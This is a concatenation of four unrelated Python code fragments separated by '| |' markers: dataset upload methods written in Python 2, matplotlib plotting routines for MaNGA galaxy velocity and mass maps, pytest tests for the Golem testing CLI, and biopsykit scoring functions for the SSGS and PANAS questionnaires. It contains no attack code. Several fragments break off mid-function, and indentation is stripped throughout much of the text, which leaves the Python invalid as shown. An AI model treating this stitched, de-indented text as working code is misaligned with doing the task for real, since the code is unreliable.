This function packages all of the datasets into individual tar.gz files and
uploads them to the dataset
"""
base_path = os.path.dirname(directory_path)
return_period_search = re.compile(r'return_(\d+)_points\.txt')
#zip file and get dataset information
print "Zipping and uploading warning points files for watershed: %s %s" % (self.watershed, self.subbasin)
directory_files = glob(os.path.join(directory_path,search_string))
for directory_file in directory_files:
return_period = return_period_search.search(os.path.basename(directory_file)).group(1)
self.update_resource_return_period(return_period)
#tar.gz file
output_tar_file = os.path.join(base_path, "%s.tar.gz" % self.resource_name)
if not os.path.exists(output_tar_file):
with tarfile.open(output_tar_file, "w:gz") as tar:
tar.add(directory_file, arcname=os.path.basename(directory_file))
#upload file
self.upload_resource(output_tar_file)
os.remove(output_tar_file)
print "%s datasets uploaded" % len(directory_files)
def zip_upload_forecasts_in_directory(self, directory_path, search_string="*.nc"):
"""
This function packages all of the datasets into individual tar.gz files and
uploads them to the dataset
"""
base_path = os.path.dirname(directory_path)
ensemble_number_search = re.compile(r'Qout_\w+_(\d+)\.nc')
#zip file and get dataset information
print "Zipping and uploading files for watershed: %s %s" % (self.watershed, self.subbasin)
directory_files = glob(os.path.join(directory_path,search_string))
for directory_file in directory_files:
ensemble_number = ensemble_number_search.search(os.path.basename(directory_file)).group(1)
self.update_resource_ensemble_number(ensemble_number)
#tar.gz file
output_tar_file = os.path.join(base_path, "%s.tar.gz" % self.resource_name)
if not os.path.exists(output_tar_file):
with tarfile.open(output_tar_file, "w:gz") as tar:
tar.add(directory_file, arcname=os.path.basename(directory_file))
#upload file
resource_info = self.upload_resource(output_tar_file)
os.remove(output_tar_file)
print "%s datasets uploaded" % len(directory_files)
return resource_info
def zip_upload_resources(self, source_directory):
"""
| |
import os
import gc
import numpy as np
import numpy.ma as ma
import matplotlib
matplotlib.use('TKAgg')
import matplotlib.pyplot as plt
###############################################################################
###############################################################################
###############################################################################
def plot_vband_image(v_band, gal_ID, IMAGE_DIR=None, IMAGE_FORMAT='eps', ax=None):
'''
Creates a plot of the v-band flux map
Parameters:
===========
v_band : numpy array of shape (n,n)
v_band flux map
gal_ID : string
MaNGA plate number - MaNGA fiberID number
IMAGE_DIR : string
Path of directory to store images
IMAGE_FORMAT : string
Format of saved image. Default is eps
ax : matplotlib.pyplot axis object
Axes handle on which to create plot
'''
###########################################################################
# Dimensions of array
#--------------------------------------------------------------------------
array_length = v_band.shape[0] # y-coordinate distance
array_width = v_band.shape[1] # x-coordinate distance
###########################################################################
###########################################################################
v_band_cbar_ticks = np.linspace( 0, v_band.max(), 7)
for val, i in zip( v_band_cbar_ticks, range( len( v_band_cbar_ticks))):
val = '%.3f' % val
v_band_cbar_ticks[i] = val
if ax is None:
fig, ax = plt.subplots()
ax.set_title( gal_ID + ' Visual Band')
v_band_im = ax.imshow( v_band, origin='lower')
    cbar = plt.colorbar( v_band_im, ax=ax, ticks = v_band_cbar_ticks)
cbar.ax.tick_params( direction='in', color='white')
cbar.set_label('Visual Band Flux [$10^{-17}$ erg s$^{-1}$ cm$^{-2}$]')
ax.set_xticks( np.arange( 0, array_width, 10))
ax.set_yticks( np.arange( 0, array_length, 10))
ax.tick_params( axis='both', direction='in', color='white')
ax.yaxis.set_ticks_position('both')
ax.xaxis.set_ticks_position('both')
ax.set_xlabel('spaxel')
ax.set_ylabel('spaxel')
###########################################################################
###########################################################################
# Save figure
#--------------------------------------------------------------------------
if IMAGE_DIR is not None:
#######################################################################
# Create output directory if it does not already exist
#----------------------------------------------------------------------
if not os.path.isdir( IMAGE_DIR + '/unmasked_v_band'):
os.makedirs( IMAGE_DIR + '/unmasked_v_band')
#######################################################################
plt.savefig( IMAGE_DIR + '/unmasked_v_band/' + gal_ID + '_v_band_raw.' + IMAGE_FORMAT, format=IMAGE_FORMAT)
#######################################################################
# Figure cleanup
#----------------------------------------------------------------------
#plt.show()
plt.cla()
plt.clf()
plt.close()
del cbar, v_band_im
gc.collect()
#######################################################################
###############################################################################
###############################################################################
###############################################################################
def plot_sMass_image(sMass,
gal_ID,
IMAGE_DIR=None,
IMAGE_FORMAT='eps',
ax=None):
'''
Creates a plot of the stellar mass density map
Parameters:
===========
sMass : numpy array of shape (n,n)
stellar mass density map
gal_ID : string
MaNGA plate number - MaNGA fiberID number
IMAGE_DIR : string
Path of directory to store images
IMAGE_FORMAT : string
Format of saved image. Default is eps
ax : matplotlib.pyplot axis object
Axes handle on which to create plot
'''
###########################################################################
# Dimensions of array
#--------------------------------------------------------------------------
array_length = sMass.shape[0] # y-coordinate distance
array_width = sMass.shape[1] # x-coordinate distance
###########################################################################
###########################################################################
sMass_max = ma.max(sMass)
sMass_cbar_ticks = np.linspace( 0, sMass_max, 7)
for val, i in zip( sMass_cbar_ticks, range( len( sMass_cbar_ticks))):
val = '%.3f' % val
sMass_cbar_ticks[i] = val
if ax is None:
fig, ax = plt.subplots()
ax.set_title( gal_ID + ' stellar mass density')
sMass_im = ax.imshow( sMass, origin='lower')
cbar = plt.colorbar( sMass_im, ax=ax, ticks = sMass_cbar_ticks)
cbar.ax.tick_params( direction='in', color='white')
cbar.set_label(r'stellar mass density [log($M/M_\odot$)]')
ax.set_xticks( np.arange( 0, array_width, 10))
ax.set_yticks( np.arange( 0, array_length, 10))
ax.tick_params( axis='both', direction='in', color='white')
ax.yaxis.set_ticks_position('both')
ax.xaxis.set_ticks_position('both')
ax.set_xlabel('spaxel')
ax.set_ylabel('spaxel')
###########################################################################
###########################################################################
# Save figure
#--------------------------------------------------------------------------
if IMAGE_DIR is not None:
#######################################################################
# Create output directory if it does not already exist
#----------------------------------------------------------------------
if not os.path.isdir( IMAGE_DIR + '/sMass'):
os.makedirs( IMAGE_DIR + '/sMass')
#######################################################################
plt.savefig(IMAGE_DIR + '/sMass/' + gal_ID + '_sMass.' + IMAGE_FORMAT,
format=IMAGE_FORMAT)
#######################################################################
# Figure cleanup
#----------------------------------------------------------------------
#plt.show()
plt.cla()
plt.clf()
plt.close()
del cbar, sMass_im
gc.collect()
#######################################################################
###############################################################################
###############################################################################
###############################################################################
def plot_Ha_vel(Ha_vel,
gal_ID,
IMAGE_DIR=None,
FOLDER_NAME=None,
IMAGE_FORMAT='eps',
FILENAME_SUFFIX=None,
ax=None):
'''
Creates a plot of the H-alpha velocity map.
Parameters:
===========
Ha_vel : numpy array of shape (n,n)
H-alpha velocity map
gal_ID : string
MaNGA plate number - MaNGA fiberID number
IMAGE_DIR : string
Path of directory to store images
FOLDER_NAME : string
Name of folder in which to save image
IMAGE_FORMAT : string
Format of saved image. Default is eps
FILENAME_SUFFIX : string
Suffix to append to gal_ID to create image filename
ax : matplotlib.pyplot figure axis object
Axes handle on which to create plot
'''
if ax is None:
fig, ax = plt.subplots()
###########################################################################
# Dimensions of array
#--------------------------------------------------------------------------
array_length = Ha_vel.shape[0] # y-coordinate distance
array_width = Ha_vel.shape[1] # x-coordinate distance
###########################################################################
###########################################################################
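    # Center the diverging 'bwr' colormap on zero: if the map contains negative
    # velocities, use symmetric limits (+/- the largest absolute value) so that
    # white corresponds to v = 0; otherwise simply scale from 0 to the maximum.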
minimum = np.min( Ha_vel)
maximum = np.max( Ha_vel)
if minimum > 0:
vmax_bound = maximum
vmin_bound = 0
else:
vmax_bound = np.max( [np.abs(minimum), np.abs(maximum)])
vmin_bound = -vmax_bound
cbar_ticks = np.linspace( vmin_bound, vmax_bound, 11, dtype='int')
ax.set_title( gal_ID + r' H$\alpha$ Velocity')
Ha_vel_im = ax.imshow( Ha_vel, cmap='bwr', origin='lower', vmin = vmin_bound, vmax = vmax_bound)
cbar = plt.colorbar( Ha_vel_im, ax=ax, ticks = cbar_ticks)
cbar.ax.tick_params( direction='in')
cbar.set_label('$v_{rot}$ [km/s]')
ax.set_xticks( np.arange( 0, array_width, 10))
ax.set_yticks( np.arange( 0, array_length, 10))
ax.tick_params( axis='both', direction='in')
ax.yaxis.set_ticks_position('both')
ax.xaxis.set_ticks_position('both')
ax.set_xlabel('spaxel')
ax.set_ylabel('spaxel')
###########################################################################
###########################################################################
# Save figure
#--------------------------------------------------------------------------
if IMAGE_DIR is not None:
###########################################################################
# Create output directory if it does not already exist
#--------------------------------------------------------------------------
if not os.path.isdir( IMAGE_DIR + FOLDER_NAME):
os.makedirs( IMAGE_DIR + FOLDER_NAME)
###########################################################################
plt.savefig( IMAGE_DIR + FOLDER_NAME + gal_ID + FILENAME_SUFFIX + IMAGE_FORMAT, format=IMAGE_FORMAT)
#######################################################################
# Figure cleanup
#----------------------------------------------------------------------
#plt.show()
plt.cla()
plt.clf()
plt.close()
del cbar, Ha_vel_im
gc.collect()
#######################################################################
###############################################################################
###############################################################################
###############################################################################
def plot_rot_curve(gal_ID, data_table, IMAGE_DIR=None, IMAGE_FORMAT=None, ax=None):
'''
Plot galaxy rotation curves
Parameters:
===========
gal_ID : string
MaNGA plate number - MaNGA fiberID number
data_table : Astropy QTable
Table containing measured rotational velocities at given deprojected
radii
IMAGE_DIR : string
Path of directory to store images
IMAGE_FORMAT : string
Format of saved image
ax : matplotlib.pyplot figure axis object
Axes handle on which to create plot
'''
if ax is None:
fig, ax = plt.subplots( figsize=(5, 5))
###########################################################################
ax.set_title( gal_ID + ' Rotation Curves')
ax.plot( data_table['deprojected_distance'], data_table['max_velocity'],
'rs', markersize=5, label='Total (pos)')
ax.plot( data_table['deprojected_distance'], np.abs( data_table['min_velocity']),
'b^', markersize=5, label='Total (neg)')
ax.plot( data_table['deprojected_distance'], data_table['rot_vel_avg'],
'gp', markersize=7, label='Total (avg)')
ax.plot( data_table['deprojected_distance'], data_table['sVel_rot'],
'cD', markersize=4, label='Stellar mass')
ax.plot( data_table['deprojected_distance'], data_table['dmVel_rot'],
'kX', markersize=7, label='Dark matter')
ax.tick_params( axis='both', direction='in')
ax.yaxis.set_ticks_position('both')
ax.xaxis.set_ticks_position('both')
ax.set_xlabel('Deprojected Radius [kpc/h]')
ax.set_ylabel('Rotational Velocity [km/s]')
ax.legend(loc='upper left')
###########################################################################
###########################################################################
# Save figure
#--------------------------------------------------------------------------
if IMAGE_DIR is not None:
#######################################################################
# Create output directory if it does not already exist
#----------------------------------------------------------------------
if not os.path.isdir( IMAGE_DIR + '/rot_curves'):
os.makedirs( IMAGE_DIR + '/rot_curves')
#######################################################################
plt.savefig( IMAGE_DIR + "/rot_curves/" + gal_ID + "_rot_curve." + IMAGE_FORMAT,
format=IMAGE_FORMAT)
#######################################################################
# Figure cleanup
#----------------------------------------------------------------------
#plt.show()
plt.cla()
plt.clf()
plt.close()
gc.collect()
#######################################################################
###############################################################################
###############################################################################
###############################################################################
def plot_mass_curve(IMAGE_DIR, IMAGE_FORMAT, gal_ID, data_table):
'''
Plot the cumulative mass as a function of deprojected radius
Parameters:
===========
IMAGE_DIR : string
Path of directory to store images
IMAGE_FORMAT : string
Format of saved image
gal_ID : string
MaNGA plate number - MaNGA fiberID number
data_table : Astropy QTable
Table containing measured rotational velocities at given deprojected
radii
'''
plt.figure( figsize=(5, 5))
plt.title( gal_ID + ' Mass Curves')
plt.plot( data_table['deprojected_distance'], data_table['mass_interior'],
'gp', markersize=7, label='Total mass (avg)')
plt.plot( data_table['deprojected_distance'], data_table['sMass_interior'],
'cD', markersize=4, label='Stellar mass')
plt.plot( data_table['deprojected_distance'], data_table['dmMass_interior'],
'kX', markersize=7, label='Dark matter mass')
plt.tick_params( axis='both', direction='in')
#ax.yaxis.set_ticks_position('both')
#ax.xaxis.set_ticks_position('both')
plt.xlabel('Deprojected Radius [kpc/h]')
    plt.ylabel(r'Mass Interior [$M_{\odot}$]')
plt.legend(loc='upper left')
if IMAGE_DIR is not None:
########################################################################
# Create output directory if it does not already exist
#-----------------------------------------------------------------------
if not os.path.isdir( IMAGE_DIR + '/mass_curves'):
os.makedirs( IMAGE_DIR + '/mass_curves')
########################################################################
########################################################################
# Save figure
#-----------------------------------------------------------------------
plt.savefig( IMAGE_DIR + "/mass_curves/" + gal_ID + "_mass_curve." + IMAGE_FORMAT,
format=IMAGE_FORMAT)
########################################################################
########################################################################
# Clean up figure objects
#-----------------------------------------------------------------------
plt.cla()
plt.clf()
plt.close()
gc.collect()
########################################################################
###############################################################################
###############################################################################
###############################################################################
def plot_diagnostic_panel( IMAGE_DIR, IMAGE_FORMAT, gal_ID, v_band, masked_Ha_vel, masked_vel_contour_plot, data_table):
'''
    Plot a two-by-two paneled image containing the entire v-band array, the
    masked H-alpha array, the masked H-alpha array containing ovals of the
    spaxels processed in the algorithm, and the averaged max and min rotation
    curves alongside the stellar mass rotation curve.
Parameters:
===========
IMAGE_DIR : string
Path of directory to store images
IMAGE_FORMAT : string
Format of saved image
gal_ID : string
MaNGA plate number - MaNGA fiberID number
v_band : numpy array of shape (n,n)
v_band flux map
masked_Ha_vel : numpy array of shape (n,n)
Masked H-alpha velocity map
masked_vel_contour_plot : numpy array of shape (n,n)
Masked H-alpha velocity map showing only those spaxels within annuli
data_table : Astropy QTable
Table containing measured rotational velocities at given deprojected
radii
'''
# panel_fig, (( Ha_vel_panel, mHa_vel_panel),
# ( contour_panel, rot_curve_panel)) = plt.subplots( 2, 2)
panel_fig, (( v_band_panel, mHa_vel_panel),
( contour_panel, rot_curve_panel)) = plt.subplots( 2, 2)
panel_fig.set_figheight( 10)
panel_fig.set_figwidth( 10)
plt.suptitle( gal_ID + " Diagnostic Panel", y=1.05, fontsize=16)
plot_vband_image( v_band, gal_ID, ax=v_band_panel)
plot_Ha_vel( masked_Ha_vel, gal_ID, ax=mHa_vel_panel)
plot_Ha_vel( masked_vel_contour_plot, gal_ID, ax=contour_panel)
plot_rot_curve( | |
# repository: double-sigma/golem
import os
import pytest
import golem
from golem.cli import messages, commands
from golem.core import errors, test_directory
class TestGolemHelp:
run_commands = [
('golem', messages.USAGE_MSG),
('golem -h', messages.USAGE_MSG),
('golem --help', messages.USAGE_MSG),
('golem -h run', messages.RUN_USAGE_MSG),
('golem -h gui', messages.GUI_USAGE_MSG),
('golem -h createproject', messages.CREATEPROJECT_USAGE_MSG),
('golem -h createtest', messages.CREATETEST_USAGE_MSG),
('golem -h createsuite', messages.CREATESUITE_USAGE_MSG),
('golem -h createsuperuser', messages.CREATESUPERUSER_USAGE_MSG),
('golem run -h', messages.RUN_USAGE_MSG),
('golem gui -h', messages.GUI_USAGE_MSG),
]
@pytest.mark.slow
@pytest.mark.parametrize('command,expected', run_commands)
def test_golem_command_output(self, command, expected, testdir_session, test_utils):
os.chdir(testdir_session.path)
result = test_utils.run_command(command)
assert result == expected
@pytest.mark.slow
def test_golem_help_from_non_golem_dir(self, dir_function, test_utils):
# current directory is not a Golem directory
assert dir_function.path == os.getcwd()
result = test_utils.run_command('golem -h')
assert result == messages.USAGE_MSG
class TestGolemDirArg:
"""Test the --golem-dir arg.
This enables Golem to be called from any directory.
"""
@pytest.mark.slow
def test_specify_golem_test_directory_path(self, dir_function, test_utils):
"""The path to the Golem test directory can be specified
using the golem-dir argument
"""
os.chdir(dir_function.path)
golem_dir_name = 'golem_dir'
golem_directory = os.path.join(dir_function.path, golem_dir_name)
commands.createdirectory_command(golem_directory, download_drivers=False)
# createproject command in a non golem directory
# without golem-dir argument
command = 'golem createproject project_one'
result = test_utils.run_command(command)
msg = ('Error: {} is not an valid Golem test directory; '
'.golem file not found'.format(dir_function.path))
assert msg in result
# specify golem-dir with absolute path
command = 'golem --golem-dir {} createproject project_two'.format(golem_directory)
result = test_utils.run_command(command)
assert 'Project project_two created' in result
# specify golem-dir with relative path
command = 'golem --golem-dir {} createproject project_three'.format(golem_dir_name)
result = test_utils.run_command(command)
assert 'Project project_three created' in result
@pytest.mark.slow
def test_golem_dir_arg_does_not_point_to_test_directory(self, dir_function, test_utils):
"""Passing an invalid golem-dir argument value"""
os.chdir(dir_function.path)
dir_name = 'dir_one'
dir_path = os.path.join(dir_function.path, dir_name)
error_msg = 'Error: {} is not an valid Golem test directory; .golem file not found'
command = 'golem --golem-dir {} createproject project_two'
# invalid golem-dir with relative path
result = test_utils.run_command(command.format(dir_name))
assert error_msg.format(dir_path) in result
# invalid golem-dir with absolute path
result = test_utils.run_command(command.format(dir_path))
assert error_msg.format(dir_path) in result
class TestGolemRun:
@pytest.mark.slow
def test_golem_run_test(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
test = 'test2'
test_utils.create_test(project, test)
command = 'golem run {} {}'.format(project, test)
result = test_utils.run_command(command)
assert 'INFO Test execution started: {}'.format(test) in result
assert 'INFO Browser: chrome' in result
assert 'INFO Test Result: SUCCESS' in result
@pytest.mark.slow
def test_golem_run_suite_with_no_tests(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
suite = 'suite2'
test_utils.create_suite(project, suite)
command = 'golem run {} {}'.format(project, suite)
result = test_utils.run_command(command)
assert 'No tests found for suite suite2' in result
@pytest.mark.slow
def test_golem_run_no_args(self, project_session, test_utils):
testdir, _ = project_session.activate()
os.chdir(testdir)
result = test_utils.run_command('golem run')
expected = messages.RUN_USAGE_MSG
expected += '\nProjects:'
for project in test_directory.get_projects():
expected += '\n {}'.format(project)
assert result == expected
@pytest.mark.slow
def test_golem_run_test_b_flag(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
test = 'test2'
command = 'golem createtest {} {}'.format(project, test)
test_utils.run_command(command)
command = 'golem run {} {} -b firefox'.format(project, test)
result = test_utils.run_command(command)
assert 'INFO Test execution started: {}'.format(test) in result
assert 'INFO Browser: firefox' in result
assert 'INFO Test Result: SUCCESS' in result
@pytest.mark.slow
def test_golem_run_not_match_test_or_suite(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
test = 'test001_does_not_exist'
command = 'golem run {} {}'.format(project, test)
result = test_utils.run_command(command)
expected = ('golem run: error: the value {} does not match '
'an existing test, suite or directory'.format(test))
assert result == expected
@pytest.mark.slow
def test_golem_run_project_does_not_exist(self, testdir_session, test_utils):
testdir = testdir_session.activate()
os.chdir(testdir)
project = 'project_does_not_exist_4564546'
test = 'test002_does_not_exist'
command = 'golem run {} {}'.format(project, test)
result = test_utils.run_command(command)
expected = ('golem run: error: the project {0} does not exist'.format(project))
assert result == expected
@pytest.fixture(scope="class")
def _project_with_suite(self, project_class, test_utils):
"""A fixture of a project with class scope with one suite with
one test
"""
testdir, project = project_class.activate()
suite_name = 'suite1'
test_utils.create_test(project, name='test1')
test_utils.create_suite(project, name=suite_name, content=None, tests=['test1'])
project_class.suite_name = suite_name
return project_class
@pytest.mark.slow
def test_generate_reports(self, _project_with_suite, test_utils):
"""Assert that the reports are generated by default in the
report directory and with name: 'report'
"""
testdir, project = _project_with_suite.activate()
suite_name = _project_with_suite.suite_name
os.chdir(testdir)
timestamp = '0.1.2.3.001'
cmd = ('golem run {} {} -r html html-no-images junit --timestamp {}'
.format(project, suite_name, timestamp))
test_utils.run_command(cmd)
reportdir = os.path.join(testdir, 'projects', project, 'reports', suite_name, timestamp)
assert os.path.isfile(os.path.join(reportdir, 'report.html'))
assert os.path.isfile(os.path.join(reportdir, 'report-no-images.html'))
assert os.path.isfile(os.path.join(reportdir, 'report.xml'))
# report.json is generated by default
assert os.path.isfile(os.path.join(reportdir, 'report.json'))
@pytest.mark.slow
def test_generate_reports_with_report_folder(self, _project_with_suite, test_utils):
"""Assert that the reports are generated in the report-folder"""
testdir, project = _project_with_suite.activate()
suite_name = _project_with_suite.suite_name
os.chdir(testdir)
timestamp = '0.1.2.3.002'
reportdir = os.path.join(testdir, 'report-folder')
cmd = ('golem run {} {} -r html html-no-images junit json --report-folder {} '
'--timestamp {}'.format(project, suite_name, reportdir, timestamp))
test_utils.run_command(cmd)
assert os.path.isfile(os.path.join(reportdir, 'report.html'))
assert os.path.isfile(os.path.join(reportdir, 'report-no-images.html'))
assert os.path.isfile(os.path.join(reportdir, 'report.xml'))
assert os.path.isfile(os.path.join(reportdir, 'report.json'))
@pytest.mark.slow
    def test_generate_reports_with_report_name(self, _project_with_suite,
                                               test_utils):
        """Assert that the reports are generated with the given report-name in the default report directory"""
testdir, project = _project_with_suite.activate()
suite_name = _project_with_suite.suite_name
os.chdir(testdir)
timestamp = '0.1.2.3.003'
reportdir = os.path.join(testdir, 'projects', project, 'reports', suite_name, timestamp)
report_name = 'foo'
cmd = ('golem run {} {} -r html html-no-images junit json --report-name {} '
'--timestamp {}'.format(project, suite_name, report_name, timestamp))
test_utils.run_command(cmd)
assert os.path.isfile(os.path.join(reportdir, 'foo.html'))
assert os.path.isfile(os.path.join(reportdir, 'foo-no-images.html'))
assert os.path.isfile(os.path.join(reportdir, 'foo.xml'))
assert os.path.isfile(os.path.join(reportdir, 'foo.json'))
@pytest.mark.slow
def test_generate_reports_with_report_folder_report_name(self, _project_with_suite,
test_utils):
"""Assert that the reports are generated in the report-folder with report-name"""
testdir, project = _project_with_suite.activate()
suite_name = _project_with_suite.suite_name
os.chdir(testdir)
timestamp = '0.1.2.3.004'
reportdir = os.path.join(testdir, 'report-folder')
report_name = 'foo'
cmd = ('golem run {} {} -r html html-no-images junit json --report-folder {} '
'--report-name {} --timestamp {}'
.format(project, suite_name, reportdir, report_name, timestamp))
test_utils.run_command(cmd)
assert os.path.isfile(os.path.join(reportdir, 'foo.html'))
assert os.path.isfile(os.path.join(reportdir, 'foo-no-images.html'))
assert os.path.isfile(os.path.join(reportdir, 'foo.xml'))
assert os.path.isfile(os.path.join(reportdir, 'foo.json'))
@pytest.mark.slow
def test_golem_run__cli_log_level_arg(self, project_session, test_utils):
"""Set cli-log-level arg, overrides default level (INFO)"""
path, project = project_session.activate()
os.chdir(path)
test_name = test_utils.random_string()
test_content = ('def test(data):\n'
' log("info msg", "INFO")\n'
' log("warning msg", "WARNING")\n')
test_utils.create_test(project, test_name, test_content)
command = 'golem run {} {} --cli-log-level WARNING'.format(project, test_name)
result = test_utils.run_command(command)
assert 'INFO info msg' not in result
assert 'WARNING warning msg' in result
class TestGolemCreateProject:
@pytest.mark.slow
def test_golem_createproject(self, testdir_session, test_utils):
testdir_session.activate()
os.chdir(testdir_session.path)
project = test_utils.random_string()
cmd = 'golem createproject {}'.format(project)
result = test_utils.run_command(cmd)
assert result == 'Project {} created'.format(project)
projects = test_directory.get_projects()
assert project in projects
@pytest.mark.slow
def test_golem_createproject_no_args(self, testdir_session, test_utils):
testdir_session.activate()
os.chdir(testdir_session.path)
result = test_utils.run_command('golem createproject')
expected = ('usage: golem createproject [-h] project\n'
'golem createproject: error: the following '
'arguments are required: project')
assert result == expected
@pytest.mark.slow
def test_golem_createproject_project_exists(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
cmd = 'golem createproject {}'.format(project)
result = test_utils.run_command(cmd)
expected = ('golem createproject: error: a project with name \'{}\' already exists'
.format(project))
assert result == expected
class TestGolemCreateSuite:
@pytest.mark.slow
def test_golem_createsuite(self, project_session, test_utils):
testdir, project = project_session.activate()
os.chdir(testdir)
suite = test_utils.random_string()
command = 'golem createsuite {} {}'.format(project, suite)
result = test_utils.run_command(command)
msg = 'Suite {} created for project {}'.format(suite, project)
assert result == msg
spath = os.path.join(project_session.path, 'suites', suite+'.py')
assert os.path.isfile(spath)
@pytest.mark.slow
def test_golem_createsuite_no_args(self, project_session, test_utils):
path, _ = project_session.activate()
os.chdir(path)
result = test_utils.run_command('golem createsuite')
expected = ('usage: golem createsuite [-h] project suite\n'
'golem createsuite: error: the following arguments '
'are required: project, suite')
assert result == expected
@pytest.mark.slow
def test_golem_createsuite_project_does_not_exist(self, testdir_session, test_utils):
testdir_session.activate()
os.chdir(testdir_session.path)
project = 'project_does_not_exist'
suite = 'suite_test_00002'
cmd = 'golem createsuite {} {}'.format(project, suite)
result = test_utils.run_command(cmd)
expected = ('golem createsuite: error: a project with name {} '
'does not exist'.format(project))
assert result == expected
@pytest.mark.slow
def test_golem_createsuite_already_exists(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
suite = test_utils.random_string()
command = 'golem createsuite {} {}'.format(project, suite)
test_utils.run_command(command)
result = test_utils.run_command(command)
expected = 'golem createsuite: error: A suite with that name already exists'
assert result == expected
class TestGolemCreateTest:
@pytest.mark.slow
def test_golem_createtest(self, project_session, test_utils):
testdir, project = project_session.activate()
os.chdir(testdir)
test = test_utils.random_string()
command = 'golem createtest {} {}'.format(project, test)
result = test_utils.run_command(command)
msg = 'Test {} created for project {}'.format(test, project)
assert result == msg
tpath = os.path.join(project_session.path, 'tests', test+'.py')
assert os.path.isfile(tpath)
@pytest.mark.slow
def test_golem_createtest_no_args(self, project_session, test_utils):
path, project = project_session.activate()
os.chdir(path)
result = test_utils.run_command('golem createtest')
expected = ('usage: golem createtest [-h] project test\n'
'golem createtest: error: the following arguments '
'are required: project, test')
assert result == expected
@pytest.mark.slow
def test_golem_createtest_project_not_exist(self, testdir_session, test_utils):
testdir = testdir_session.activate()
os.chdir(testdir)
project = 'project_not_exist'
test = 'test_0004'
cmd = | |
6, 9, 12, 15]
.. note::
This implementation assumes a score range of [1, 5].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
.. warning::
Column indices in ``subscales`` are assumed to start at 1 (instead of 0) to avoid confusion with
questionnaire item columns, which typically also start with index 1!
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
subscales : dict, optional
A dictionary with subscale names (keys) and column names or column indices (count-by-1) (values)
if only specific subscales should be computed.
Returns
-------
:class:`~pandas.DataFrame`
SSGS score
Raises
------
ValueError
        if ``subscales`` is supplied and dict values are something other than a list of strings or a list of ints
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., <NAME>., <NAME>., & <NAME>. (2008). The psychobiology of trait shame in young women:
Extending the social self preservation theory. *Health Psychology*, 27(5), 523.
<NAME>., <NAME>., & <NAME>. (1994). The state shame and guilt scale.
*Fairfax, VA: George Mason University*.
"""
score_name = "SSGS"
score_range = [1, 5]
# create copy of data
data = data.copy()
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
if subscales is None:
_assert_num_columns(data, 15)
subscales = {
"Pride": [1, 4, 7, 10, 13],
"Shame": [2, 5, 8, 11, 14],
"Guilt": [3, 6, 9, 12, 15],
}
_assert_value_range(data, score_range)
ssgs_data = _compute_questionnaire_subscales(data, score_name, subscales)
return pd.DataFrame(ssgs_data, index=data.index)
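# Illustrative usage sketch (not part of the original module). Column names and
# values below are made up; numpy/pandas are assumed to be imported as np/pd,
# as elsewhere in this module.
def _example_ssgs_usage():
    """Minimal sketch showing how ``ssgs`` might be called."""
    data = pd.DataFrame(
        np.random.randint(1, 6, size=(4, 15)),
        columns=["SSGS_{:02d}".format(i) for i in range(1, 16)],
    )
    # full score with the default Pride/Shame/Guilt subscales
    full_scores = ssgs(data)
    # only the Shame subscale, addressed by item indices (count-by-1)
    shame_only = ssgs(data, subscales={"Shame": [2, 5, 8, 11, 14]})
    return full_scores, shame_only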
def panas(
data: pd.DataFrame,
columns: Optional[Union[Sequence[str], pd.Index]] = None,
language: Optional[Literal["english", "german"]] = None,
) -> pd.DataFrame:
"""Compute the **Positive and Negative Affect Schedule (PANAS)**.
The PANAS assesses *positive affect* (interested, excited, strong, enthusiastic, proud, alert, inspired,
determined, attentive, and active) and *negative affect* (distressed, upset, guilty, scared, hostile, irritable,
ashamed, nervous, jittery, and afraid).
Higher scores on each subscale indicate greater positive or negative affect.
.. note::
This implementation assumes a score range of [1, 5].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
.. warning::
Column indices in ``subscales`` are assumed to start at 1 (instead of 0) to avoid confusion with
questionnaire item columns, which typically also start with index 1!
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
language : "english" or "german", optional
Language of the questionnaire used since index items differ between the german and the english version.
Default: ``english``
Returns
-------
:class:`~pandas.DataFrame`
PANAS score
Raises
------
ValueError
        if ``subscales`` is supplied and dict values are something other than a list of strings or a list of ints
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
    Watson, D., Clark, L. A., & Tellegen, A. (1988). Development and validation of brief measures of positive and
    negative affect: the PANAS scales. *Journal of personality and social psychology*, 54(6), 1063.
"""
score_name = "PANAS"
score_range = [1, 5]
supported_versions = ["english", "german"]
# create copy of data
data = data.copy()
if language is None:
language = "english"
if language not in supported_versions:
raise ValueError("questionnaire_version must be one of {}, not {}.".format(supported_versions, language))
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
_assert_num_columns(data, 20)
_assert_value_range(data, score_range)
if language == "german":
# German Version has other item indices
subscales = {
"NegativeAffect": [2, 5, 7, 8, 9, 12, 14, 16, 19, 20],
"PositiveAffect": [1, 3, 4, 6, 10, 11, 13, 15, 17, 18],
}
else:
subscales = {
"NegativeAffect": [2, 4, 6, 7, 8, 11, 13, 15, 18, 20],
"PositiveAffect": [1, 3, 5, 9, 10, 12, 14, 16, 17, 19],
}
# PANAS is a mean, not a sum score!
panas_data = _compute_questionnaire_subscales(data, score_name, subscales, agg_type="mean")
data = _invert_subscales(
